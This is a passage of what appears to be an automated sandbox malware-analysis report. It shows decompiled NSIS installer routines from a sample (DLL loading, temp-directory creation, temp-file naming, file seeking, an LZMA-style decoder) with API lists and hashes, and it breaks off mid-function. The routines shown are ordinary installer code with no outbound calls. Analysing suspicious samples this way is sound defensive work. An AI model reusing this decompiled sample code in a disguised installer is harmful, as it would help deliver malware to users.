					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                    0x004069dc
                    0x004069e5
                    0x004069e7
                    0x004069e7
                    0x004069eb
                    0x004069fe
                    0x004069f8
                    0x004069f8
                    0x004069f8
                    0x00406a17
                    0x00406a2b
                    0x00406a32

                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                    • wsprintfW.USER32 ref: 00406A17
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                    C-Code - Quality: 100%
                    			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                    0x00405ba4
                    0x00405ba8
                    0x00405bab
                    0x00405bb1
                    0x00405bb5
                    0x00405bb9
                    0x00405bc1
                    0x00405bc8
                    0x00405bce
                    0x00405bd5
                    0x00405bdc
                    0x00405be4
                    0x00405be6
                    0x00000000
                    0x00405be6
                    0x00405bf0
                    0x00405bf7
                    0x00405c0d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405c0f
                    0x00405c13

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                    • GetLastError.KERNEL32 ref: 00405BF0
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                    • GetLastError.KERNEL32 ref: 00405C0F
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-3081826266
                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                    C-Code - Quality: 93%
                    			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40e579
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                    0x00403489
                    0x0040349c
                    0x004034a1
                    0x004035d1
                    0x004035d3
                    0x00000000
                    0x004035d9
                    0x004034ad
                    0x004034c0
                    0x004034c6
                    0x004034cc
                    0x004034d7
                    0x004034dc
                    0x004034e1
                    0x004034e9
                    0x004034eb
                    0x004034eb
                    0x004034f4
                    0x004034fb
                    0x00000000
                    0x00000000
                    0x00403501
                    0x00403507
                    0x0040350d
                    0x00000000
                    0x00403513
                    0x00403519
                    0x00403539
                    0x0040353e
                    0x00403543
                    0x00403549
                    0x0040354f
                    0x00403559
                    0x00403560
                    0x00000000
                    0x00000000
                    0x00403562
                    0x00403568
                    0x0040356a
                    0x0040358d
                    0x00403593
                    0x00000000
                    0x00000000
                    0x00403595
                    0x00403597
                    0x00000000
                    0x00000000
                    0x00403599
                    0x00403599
                    0x004035ac
                    0x00000000
                    0x00000000
                    0x004035bb
                    0x00000000
                    0x004035bb
                    0x00403574
                    0x0040357b
                    0x004035c8
                    0x004035ce
                    0x004035ce
                    0x00000000
                    0x004035ce
                    0x0040357d
                    0x00403583
                    0x00403589
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004035cc
                    0x004035cc
                    0x00000000
                    0x004035cc
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 0040348D
                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FilePointer$CountTick
                    • String ID: y@
                    • API String ID: 1092082344-1430850693
                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                    C-Code - Quality: 100%
                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                    0x0040618d
                    0x00406193
                    0x00406194
                    0x00406194
                    0x00406199
                    0x0040619a
                    0x0040619d
                    0x004061a2
                    0x004061a5
                    0x004061af
                    0x004061bc
                    0x004061c0
                    0x004061c8
                    0x00000000
                    0x00000000
                    0x004061cc
                    0x00000000
                    0x004061ce
                    0x004061ce
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d4
                    0x004061d7
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 004061A5
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-678247507
                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                    C-Code - Quality: 100%
                    			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nse83F2.tmp\\", 7); // executed
				return _t4;
			}







                    0x00403c25
                    0x00403c34
                    0x00403c37
                    0x00403c39
                    0x00403c39
                    0x00403c40
                    0x00403c48
                    0x00403c4b
                    0x00403c4d
                    0x00403c4d
                    0x00403c4d
                    0x00403c54
                    0x00403c60
                    0x00403c66

                    APIs
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                    • C:\Users\user\AppData\Local\Temp\nse83F2.tmp\, xrefs: 00403C5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse83F2.tmp\
                    • API String ID: 2962429428-242142104
                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 672 40603f-40605a call 406668 call 405fe2 677 406060-40606d call 4068ef 672->677 678 40605c-40605e 672->678 682 40607d-406081 677->682 683 40606f-406075 677->683 679 4060b8-4060ba 678->679 685 406097-4060a0 lstrlenW 682->685 683->678 684 406077-40607b 683->684 684->678 684->682 686 4060a2-4060b6 call 405f37 GetFileAttributesW 685->686 687 406083-40608a call 40699e 685->687 686->679 692 406091-406092 call 405f83 687->692 693 40608c-40608f 687->693 692->685 693->678 693->692
                    C-Code - Quality: 53%
                    			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                    0x0040604b
                    0x00406056
                    0x0040605a
                    0x00406061
                    0x0040606d
                    0x0040607d
                    0x0040607f
                    0x00406097
                    0x00406098
                    0x0040609f
                    0x004060a0
                    0x00000000
                    0x00000000
                    0x00406083
                    0x0040608a
                    0x00406092
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040608a
                    0x004060a2
                    0x004060a8
                    0x00000000
                    0x004060b6
                    0x0040606f
                    0x00406075
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406075
                    0x0040605c
                    0x00000000

                    APIs
                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID: P_B
                    • API String ID: 3248276644-906794629
                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 695 407194-40719a 696 40719c-40719e 695->696 697 40719f-4071bd 695->697 696->697 698 407490-40749d 697->698 699 4073cb-4073e0 697->699 702 4074c7-4074cb 698->702 700 4073e2-4073f8 699->700 701 4073fa-407410 699->701 703 407413-40741a 700->703 701->703 704 40752b-40753e 702->704 705 4074cd-4074ee 702->705 706 407441 703->706 707 40741c-407420 703->707 710 407447-40744d 704->710 708 4074f0-407505 705->708 709 407507-40751a 705->709 706->710 711 407426-40743e 707->711 712 4075cf-4075d9 707->712 713 40751d-407524 708->713 709->713 715 406bf2 710->715 716 4075fa 710->716 711->706 717 4075e5-4075f8 712->717 718 4074c4 713->718 719 407526 713->719 720 406bf9-406bfd 715->720 721 406d39-406d5a 715->721 722 406c9e-406ca2 715->722 723 406d0e-406d12 715->723 725 4075fd-407601 716->725 717->725 718->702 726 4074a9-4074c1 719->726 727 4075db 719->727 720->717 728 406c03-406c10 720->728 721->699 731 406ca8-406cc1 722->731 732 40754e-407558 722->732 729 406d18-406d2c 723->729 730 40755d-407567 723->730 726->718 727->717 728->716 733 406c16-406c5c 728->733 734 406d2f-406d37 729->734 730->717 735 406cc4-406cc8 731->735 732->717 736 406c84-406c86 733->736 737 406c5e-406c62 733->737 734->721 734->723 735->722 738 406cca-406cd0 735->738 743 406c94-406c9c 736->743 744 406c88-406c92 736->744 741 406c64-406c67 GlobalFree 737->741 742 406c6d-406c7b GlobalAlloc 737->742 739 406cd2-406cd9 738->739 740 406cfa-406d0c 738->740 745 406ce4-406cf4 GlobalAlloc 739->745 746 406cdb-406cde GlobalFree 739->746 740->734 741->742 742->716 747 406c81 742->747 743->735 744->743 744->744 745->716 745->740 746->745 747->736
                    C-Code - Quality: 99%
                    			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
